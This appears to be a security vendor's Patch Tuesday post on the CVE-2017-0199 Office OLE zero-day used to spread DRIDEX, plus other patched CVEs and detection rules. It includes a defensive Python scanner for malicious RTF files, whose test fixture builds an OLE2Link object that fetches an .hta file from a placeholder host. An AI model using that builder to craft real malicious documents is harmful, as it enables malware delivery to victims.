
April Patch Tuesday: Microsoft Patches Office Vulnerability Used in Zero-Day Attacks

  • Posted on:April 12, 2017 at 8:57 am
  • Posted in:Vulnerabilities
  • Author:
    Ronaldo Mangahas (Technical Communications)

One of the major updates in this month’s Patch Tuesday addresses CVE-2017-0199, a zero-day remote code execution vulnerability in the Windows Object Linking and Embedding (OLE) interface used by Microsoft Office. The flaw was already being exploited in the wild before the patch shipped, currently by the operators of the notorious DRIDEX banking trojan.

Threat actors leveraging this vulnerability do so via a spam campaign: the attacker emails a malicious Microsoft Word document (an RTF file carrying an embedded OLE2link object) to the targeted user. When the user opens the attachment, the embedded object causes Word to connect to a remote server and fetch the malicious payload, which in this campaign is a DRIDEX variant (the components involved are detected by Trend Micro as TSPY_DRIDEX.SLP, TROJ_CVE20170199.B and TROJ_CVE20170199.C). No macros are involved, so macro-blocking policies alone do not stop this chain; the user merely has to open the document.

The following DPI rules from Trend Micro Deep Security and Vulnerability Protection address this critical vulnerability:

  • 1008285-Microsoft Word Remote Code Execution Vulnerability (CVE-2017-0199)
  • 1008295-Restrict Microsoft Word RTF File With Embedded OLE2link Object (CVE-2017-0199)
  • 1008297-Identified Suspicious RTF File With Obfuscated Powershell Execution (CVE-2017-0199)
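The attack chain and the detection rules above both hinge on the same indicators inside the RTF file: an auto-linked object (`\objautlink`) that is forced to refresh on open (`\objupdate`), whose `\objdata` hex blob carries the OLE2Link class ID and a URL moniker pointing at a remote server. The following Python scanner is an added example, not Trend Micro's own detection logic, that looks for exactly those indicators. It assumes the documented little-endian serialization of the two CLSIDs and the URL moniker layout (CLSID, DWORD length, null-terminated UTF-16LE URL); the RTF documents and the hostname `example.invalid` are constructed test data. Real samples wrap the moniker in a full OLE compound file and often obfuscate the hex, so a production scanner should parse the container properly (for example with oletools' `rtfobj`) rather than pattern-match the raw blob as this example does.

```python
"""Heuristic scanner for RTF documents abusing CVE-2017-0199 (OLE2Link + URL moniker).

Added example, not Trend Micro's detection code. Flags an RTF whose embedded
object data contains the OLE2Link class ID together with a URL moniker.
"""
import re
import struct
import uuid

# COM class IDs, serialized little-endian exactly as they appear on disk.
OLE2LINK_CLSID = uuid.UUID("00000300-0000-0000-C000-000000000046").bytes_le
URL_MONIKER_CLSID = uuid.UUID("79EAC9E0-BAF9-11CE-8C82-00AA004BA90B").bytes_le

# Captures the hex payload of a {\*\objdata ...} group (assumes no nested groups).
OBJDATA_RE = re.compile(rb"\\objdata\b([^{}]*)")


def decode_objdata_hex(raw: bytes) -> bytes:
    """RTF hex data is wrapped across lines; drop everything that is not a hex digit."""
    hexdigits = re.sub(rb"[^0-9A-Fa-f]", b"", raw)
    if len(hexdigits) % 2:
        hexdigits = hexdigits[:-1]
    return bytes.fromhex(hexdigits.decode("ascii"))


def extract_url_moniker_targets(blob: bytes) -> list:
    """Return every URL stored after a URL moniker CLSID in the blob.

    Serialized URL moniker: CLSID (16 bytes), little-endian DWORD byte length,
    then the URL as null-terminated UTF-16LE.
    """
    targets = []
    pos = 0
    while True:
        idx = blob.find(URL_MONIKER_CLSID, pos)
        if idx < 0:
            break
        body = idx + len(URL_MONIKER_CLSID)
        if body + 4 <= len(blob):
            (length,) = struct.unpack_from("<I", blob, body)
            raw = blob[body + 4 : body + 4 + (length - length % 2)]
            try:
                targets.append(raw.decode("utf-16-le").split("\x00", 1)[0])
            except UnicodeDecodeError:
                pass
        pos = body
    return targets


def analyze_rtf(rtf: bytes) -> dict:
    """Score one RTF document; 'suspicious' means an OLE2Link object with a remote URL."""
    findings = {
        "objautlink": b"\\objautlink" in rtf,
        "objupdate": b"\\objupdate" in rtf,  # forces the linked object to refresh on open
        "ole2link": False,
        "urls": [],
    }
    for match in OBJDATA_RE.finditer(rtf):
        blob = decode_objdata_hex(match.group(1))
        if OLE2LINK_CLSID in blob:
            findings["ole2link"] = True
        findings["urls"].extend(extract_url_moniker_targets(blob))
    findings["suspicious"] = findings["ole2link"] and bool(findings["urls"])
    return findings


def to_rtf_hex(blob: bytes, width: int = 64) -> bytes:
    """Encode bytes the way RTF writers do: lowercase hex wrapped at a fixed width."""
    hexdata = blob.hex().encode("ascii")
    return b"\n".join(hexdata[i : i + width] for i in range(0, len(hexdata), width))


def build_malicious_objdata(url: str) -> bytes:
    """Constructed OLE2Link + URL moniker fragment (real samples embed this in an OLE compound file)."""
    wide = url.encode("utf-16-le") + b"\x00\x00"
    return OLE2LINK_CLSID + URL_MONIKER_CLSID + struct.pack("<I", len(wide)) + wide


# Constructed test documents; example.invalid is a placeholder, not a real server.
MALICIOUS_RTF = (
    b"{\\rtf1\\ansi\n{\\object\\objautlink\\objupdate{\\*\\objclass Word.Document.8}\n"
    b"{\\*\\objdata " + to_rtf_hex(build_malicious_objdata("http://example.invalid/template.hta")) + b"}}\n}"
)
BENIGN_RTF = (
    b"{\\rtf1\\ansi\n{\\object\\objemb{\\*\\objclass Package}\n"
    b"{\\*\\objdata " + to_rtf_hex(b"\x01\x05\x00\x00\x02\x00\x00\x00" + b"\x00" * 24) + b"}}\n}"
)

if __name__ == "__main__":
    for name, doc in (("malicious", MALICIOUS_RTF), ("benign", BENIGN_RTF)):
        print(name, analyze_rtf(doc))
```

Run against a quarantined attachment, the `urls` list gives the download location to block at the proxy and to search for in web logs, which is the same pivot the DPI and TippingPoint rules make when they match the URL moniker on the wire.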

In addition to CVE-2017-0199, updates were made to the Hyper-V component of Windows Server to address four Critical vulnerabilities: CVE-2017-0162, CVE-2017-0163, CVE-2017-0180 and CVE-2017-0181. These are remote code execution vulnerabilities that trigger when the Windows Hyper-V Network Switch on a host server fails to properly validate input from an authenticated user on a guest operating system. An attacker who can run a specially crafted application inside a guest could therefore execute arbitrary code on the Hyper-V host, a guest-to-host escape that breaks the isolation boundary virtualization is supposed to provide.

Microsoft’s round of updates also contains cumulative updates that address three Critical vulnerabilities (CVE-2017-0201, CVE-2017-0202 and CVE-2017-0158) in Microsoft Internet Explorer, and another three (CVE-2017-0093, CVE-2017-0200 and CVE-2017-0205) in Microsoft Edge.

In sync with Microsoft, Adobe also released its own updates, the most important being APSB17-10, which addresses critical vulnerabilities in Adobe Flash Player, and APSB17-11, which resolves critical vulnerabilities in Adobe Acrobat and Reader. Successful exploitation of these vulnerabilities could allow an attacker to take control of the affected system.

The following vulnerabilities were disclosed via Trend Micro’s Zero Day Initiative (ZDI):

  • CVE-2017-0155
  • CVE-2017-0158
  • CVE-2017-3019
  • CVE-2017-3020
  • CVE-2017-3021
  • CVE-2017-3022
  • CVE-2017-3023
  • CVE-2017-3028
  • CVE-2017-3029
  • CVE-2017-3031
  • CVE-2017-3032
  • CVE-2017-3033
  • CVE-2017-3034
  • CVE-2017-3035
  • CVE-2017-3036
  • CVE-2017-3042
  • CVE-2017-3043
  • CVE-2017-3044
  • CVE-2017-3045
  • CVE-2017-3046
  • CVE-2017-3047
  • CVE-2017-3048
  • CVE-2017-3049
  • CVE-2017-3050
  • CVE-2017-3051
  • CVE-2017-3052
  • CVE-2017-3053
  • CVE-2017-3055
  • CVE-2017-3056
  • CVE-2017-3057
  • CVE-2017-3058
  • CVE-2017-3059
  • CVE-2017-3060
  • CVE-2017-3062

In addition to the DPI rules that protect users from CVE-2017-0199, Trend Micro Deep Security and Vulnerability Protection also protect user systems from threats that may target the following Microsoft vulnerabilities:

  • 1008274-Microsoft Windows Multiple Security Vulnerabilities (CVE-2017-0155, CVE-2017-0160, CVE-2017-0165, CVE-2017-0167, CVE-2017-0188, CVE-2017-0189, CVE-2017-0211, CVE-2017-0156)
  • 1008275-Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability (CVE-2017-0158)
  • 1008278-Microsoft LDAP Elevation Of Privilege Vulnerability (CVE-2017-0166)
  • 1008282-Microsoft Windows ATMFD.dll Information Disclosure Vulnerability (CVE-2017-0192)
  • 1008283-Microsoft Office Memory Corruption Vulnerability (CVE-2017-0194)
  • 1008284-Microsoft Office DLL Loading Vulnerability Over Network Share (CVE-2017-0197)
  • 1008286-Microsoft Edge Memory Corruption Vulnerability (CVE-2017-0200)
  • 1008287-Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability (CVE-2017-0201)
  • 1008288-Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2017-0202)
  • 1008290-Microsoft Edge Memory Corruption Vulnerability (CVE-2017-0205)
  • 1008291-Microsoft Edge Scripting Engine Information Disclosure Vulnerability (CVE-2017-0208)
  • 1008292-Microsoft Office DLL Loading Vulnerability Over WebDAV (CVE-2017-0197)
  • 1008294-Microsoft Internet Explorer Elevation Of Privilege Vulnerability (CVE-2017-0210)

TippingPoint customers are protected from attacks exploiting these vulnerabilities via these MainlineDV filters:

  • 27423: HTTP: Microsoft Template with an Embedded Shockwave Flash Object
  • 27719: HTTP: Microsoft Internet Explorer VBScript Recordset Use-After-Free Vulnerability
  • 27723: HTTP: Microsoft Edge SVG xlink Type Confusion Vulnerability
  • 27724: HTTP: Microsoft Internet Explorer Stylesheet Type Confusion Vulnerability
  • 27725: HTTP: Microsoft Edge Render Format Type Confusion Vulnerability
  • 27726: HTTP: Microsoft Word RTF objautlink Memory Corruption Vulnerability
  • 27727: HTTP: Microsoft Windows DDI Out-of-Bounds Write Vulnerability
  • 27728: HTTP: Microsoft Excel XML Memory Corruption Vulnerability
  • 27729: HTTP: Microsoft Windows Win32k KASLR Information Disclosure Vulnerability
  • 27731: HTTP: Microsoft Windows GDI Out-of-Bounds Write Vulnerability
  • 27732: HTTP: Microsoft Windows DDI Out-of-Bounds Write Vulnerability
  • 27733: HTTP: Microsoft Windows Adobe Type-1 Font ATMFD.DLL Memory Corruption Vulnerability
  • 27736: HTTP: Microsoft OneNote DLL Hijacking Vulnerability
  • 27737: HTTP: Microsoft Edge Chakra Information Disclosure Vulnerability
  • 27739: HTTP: Microsoft Windows IEETWCollector Privilege Escalation Vulnerability
  • 27740: HTTP: Microsoft .NET WMI Memory Corruption Vulnerability
  • 27841: HTTP: RTF File Implementing objautlink and URL Monikers
  • 27842: HTTP: Suspicious Obfuscated Powershell Execution
  • 27850: HTTPS: TSPY_DRIDEX.SLP Checkin

Users with Trend Micro Home Network Security are protected via the following signature:

  • 1133594 FILE Microsoft Outlook Remote Code Execution Vulnerability (CVE-2017-0199)
Tags: Patch Tuesday
